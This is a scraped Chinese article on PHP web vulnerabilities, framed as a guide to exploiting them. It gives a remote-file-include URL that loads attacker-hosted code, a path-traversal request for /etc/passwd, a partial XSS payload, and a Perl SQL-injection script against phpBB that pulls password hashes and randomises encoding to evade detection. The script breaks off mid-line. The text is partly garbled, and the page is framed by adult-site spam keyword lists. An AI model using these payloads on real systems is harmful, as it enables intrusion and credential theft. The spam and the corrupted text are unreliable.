国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術(shù)文章
文章詳情頁

常見php頁面漏洞分析及相關(guān)問題解決

瀏覽:26日期:2024-02-13 15:12:12
從現(xiàn)在的網(wǎng)絡(luò)安全來看,大家最關(guān)注和接觸最多的WEB頁面漏洞應(yīng)該是ASP了,在這方面,小竹是專家,我沒發(fā)言權(quán).然而在PHP方面來看,也同樣存在很嚴(yán)重的安全問題,但是這方面的文章卻不多.在這里,就跟大家來稍微的討論一下PHP頁面的相關(guān)漏洞吧.我對目前常見的PHP漏洞做了一下總結(jié),大致分為以下幾種:包含文件漏洞,腳本命令執(zhí)行漏洞,文件泄露漏洞,SQL注入漏洞等幾種.當(dāng)然,至于COOKIE欺騙等一部分通用的技術(shù)就不在這里討論了,這些資料網(wǎng)上也很多.那么,我們就一個一個來分析一下怎樣利用這些漏洞吧!首先,我們來討論包含文件漏洞.這個漏洞應(yīng)該說是PHP獨(dú)有的吧.這是由于不充分處理外部提供的惡意數(shù)據(jù),從而導(dǎo)致遠(yuǎn)程攻擊者可以利用這些漏洞以WEB進(jìn)程權(quán)限在系統(tǒng)上執(zhí)行任意命令.我們來看一個例子:假設(shè)在a.php中有這樣一句代碼:include($include.'/xxx.php');?>在這段代碼中,$include一般是一個已經(jīng)設(shè)置好的路徑,但是我們可以通過自己構(gòu)造一個路徑來達(dá)到攻擊的目的.比方說我們提交:a.php?include=http://web/b.php,這個web是我們用做攻擊的空間,當(dāng)然,b.php也就是我們用來攻擊的代碼了.我們可以在b.php中寫入類似于:passthru('/bin/ls /etc');的代碼.這樣,就可以執(zhí)行一些有目的的攻擊了.(注:web服務(wù)器應(yīng)該不能執(zhí)行php代碼,不然就出問題了.相關(guān)詳情可以去看<<如何對PHP程序中的常見漏洞進(jìn)行攻擊>>).在這個漏洞方面,出狀況的很多,比方說:PayPal Store Front,HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.接著,我們再來看一下腳本命令執(zhí)行漏洞.這是由于對用戶提交的URI參數(shù)缺少充分過濾,提交包含惡意HTML代碼的數(shù)據(jù),可導(dǎo)致觸發(fā)跨站腳本攻擊,可能獲得目標(biāo)用戶的敏感信息。我們也舉個例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php頁面對PHPSESSID缺少充分的過濾,我們可以通過這樣的代碼來達(dá)到攻擊的目的:http://web/index.php?PHPSESSID='>在script里面我們可以構(gòu)造函數(shù)來獲得用戶的一些敏感信息.在這個漏洞方面相對要少一點(diǎn),除了PHP Transparent之外還有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等.再然后,我們就來看看文件泄露漏洞了.這種漏洞是由于對用戶提交參數(shù)缺少充分過濾,遠(yuǎn)程攻擊者可以利用它進(jìn)行目錄遍歷攻擊以及獲取一些敏感信息。我們拿最近發(fā)現(xiàn)的phpMyAdmin來做例子.在phpMyAdmin中,export.php頁面沒有對用戶提交的'what'參數(shù)進(jìn)行充分過濾,遠(yuǎn)程攻擊者提交包含多個'../'字符的數(shù)據(jù),便可繞過WEB ROOT限制,以WEB權(quán)限查看系統(tǒng)上的任意文件信息。比方說打入這樣一個地址:export.php?what=../../../../../../etc/passwd%00 就可以達(dá)到文件泄露的目的了.在這方面相對多一點(diǎn),有:myPHPNuke,McNews等等.最后,我們又要回到最興奮的地方了.想想我們平時在asp頁面中用SQL注入有多么爽,以前還要手動注入,一直到小竹悟出'SQL注入密笈'(嘿嘿),然后再開做出NBSI以后,我們NB聯(lián)盟真是拉出一片天空.曾先后幫CSDN,大富翁論壇,中國頻道等大型網(wǎng)站找出漏洞.(這些廢話不多說了,有點(diǎn)跑題了...).還是言規(guī)正傳,其實(shí)在asp中SQL的注入和php中的SQL注入大致相同,只不過稍微注意一下用的幾個函數(shù)就好了.將asc改成ASCII,len改成LENGTH,其他函數(shù)基本不變了.其實(shí)大家看到PHP的SQL注入,是不是都會想到PHP-NUKE和PHPBB呢?不錯,俗話說樹大招分,像動網(wǎng)這樣的論壇在asp界就該是漏洞這王了,這并不是說它的論壇安全太差,而是名氣太響,別人用的多了,研究的人也就多了,發(fā)現(xiàn)的安全漏洞也就越多了.PHPBB也是一樣的,現(xiàn)在很大一部分人用PHP做論壇的話,一般都是選擇了PHPBB.它的漏洞也是一直在出,從最早phpBB.com phpBB 1.4.0版本被人發(fā)現(xiàn)漏洞,到現(xiàn)在最近的phpBB 2.0.6版本的groupcp.php,以及之前發(fā)現(xiàn)的search.php,profile.php,viewtopic.php等等加起來,大概也有十來個樣子吧.這也一直導(dǎo)致,一部分人在研究php漏洞的時候都會拿它做實(shí)驗(yàn)品,所謂百練成精嘛,相信以后的PHPBB會越來越好.好了,我們還是來分析一下漏洞產(chǎn)生的原因吧.拿viewtopic.php頁面來說,由于在調(diào)用viewtopic.php時,直接從GET請求中獲得'topic_id'并傳遞給SQL查詢命令,而并沒有進(jìn)行一些過濾的處理,攻擊者可以提交特殊的SQL字符串用于獲得MD5密碼,獲得此密碼信息可以用于自動登錄或者進(jìn)行暴力破解。(我想應(yīng)該不會有人想去暴力破解吧,除非有特別重要的原因).先看一下相關(guān)源代碼:#  if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )#  {# $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);#  }#  else if ( isset($HTTP_GET_VARS['topic']) )#  {# $topic_id = intval($HTTP_GET_VARS['topic']);#  }從上面我們可以看出,如果提交的view=newest并且sid設(shè)置了值的話,執(zhí)行的查詢代碼像下面的這個樣子(如果你還沒看過PHPBB源代碼的話,建議你看了再對著這里來看,受影響系統(tǒng)為:phpBB 2.0.5和phpBB 2.0.4).#  $sql = 'SELECT p.post_id#  FROM ' . POSTS_TABLE . ' p, ' . SESSIONS_TABLE . ' s, ' . USERS_TABLE . ' u#  WHERE s.session_id = '$session_id'# AND u.user_id = s.session_user_id# AND p.topic_id = $topic_id# AND p.post_time >= u.user_lastvisit#  ORDER BY p.post_time ASC#  LIMIT 1';Rick提供了下面的這斷測試代碼:use IO::Socket;$remote = shift || 'localhost';$view_topic = shift || '/phpBB2/viewtopic.php';$uid = shift || 2;$port = 80;$dbtype = 'mysql4'; # mysql4 or pgsqlprint 'Trying to get password hash for uid $uid server $remote dbtype: $dbtypen';$p = '';for($index=1; $index<=32; $index++){$socket = IO::Socket::INET->new(PeerAddr => $remote,PeerPort => $port,Proto => 'tcp',Type => SOCK_STREAM)or die 'Couldnt connect to $remote:$port : $@n';$str = 'GET $view_topic' . '?sid=1&topic_id=-1' . random_encode(make_dbsql()) . '&view=newest' . ' HTTP/1.0nn';print $socket $str;print $socket 'Cookie: phpBB2mysql_sid=1n';# replace this for pgsql or remove itprint $socket 'Host: $remotenn';while ($answer = <$socket>){if ($answer =~ /location:.*x23(d+)/) # Matches the location: viewtopic.php?p=#{$p .= chr ();}}close($socket);}print 'nMD5 Hash for uid $uid is $pn';# random encode str. helps avoid detectionsub random_encode{$str = shift;$ret = '';for($i=0; $i
標(biāo)簽: PHP
主站蜘蛛池模板: 国产日本欧美亚洲精品视 | 高清大学生毛片一级 | 国产精品青草久久福利不卡 | 九九热爱视频精品视频高清 | 久久久久久久久久久视频国内精品视频 | 一级毛片中国 | 欧美日韩视频一区二区 | 国产成人精品一区二区不卡 | 久草免费在线视频观看 | 可以看的毛片网站 | 亚洲免费播放 | 国产成人精品免费视 | 精品国产精品a | 成人毛片全部免费观看 | 欧美成人 综合网播九公社 欧美成人26uuu欧美毛片 | 亚洲天堂在线观看视频 | 国产美女一级毛片 | 国产亚洲一区二区精品 | 色盈盈影院 | 又刺激又黄的一级毛片 | 国产男女猛烈无遮档免费视频网站 | 国产成人久久精品 | 精品日本亚洲一区二区三区 | 日本精品视频一视频高清 | 亚洲精品国产手机 | 免费人成年短视频在线观看网站 | 国产一级毛片夜一级毛片 | 成人三级做爰在线观看男女 | 96精品免费视频大全 | 亚洲韩国欧美 | 日本一线a视频免费观看 | 纯欧美一级毛片免费 | 亚洲天堂最新网址 | 国产美女一级特黄毛片 | 欧美三级欧美成人高清www | 毛片免费在线播放 | 99国产福利视频区 | 国产成人在线免费观看 | 精品久久久久久久高清 | 四色永久| 国产精品黄在线观看免费 |